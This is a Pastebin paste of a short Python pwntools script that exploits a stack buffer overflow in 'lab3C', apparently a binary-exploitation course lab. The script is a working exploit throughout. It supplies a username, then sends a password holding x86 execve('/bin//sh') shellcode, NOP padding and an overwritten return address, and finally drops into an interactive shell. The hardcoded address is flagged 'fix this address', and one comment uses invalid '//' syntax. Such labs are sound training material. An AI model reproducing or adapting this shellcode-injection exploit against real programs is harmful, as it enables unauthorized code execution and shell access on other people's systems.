Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import time
- def hackIt():
- address_shellcode = 0xffffd5fc // fix this address
- username = "rpisec"
- r = process("./lab3C")
- print "attach %d\ndebug?" % r.pid
- raw_input()
- # r.recvuntil("Enter Username: ")
- r.sendline(username)
- r.recvuntil("Enter Password: ")
- shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
- payload = shellcode
- payload += "\x90"*(0x50-len(shellcode))
- payload += p32(address_shellcode)
- r.sendline(payload)
- r.interactive()
- hackIt()
Advertisement
Add Comment
Please, Sign In to add comment
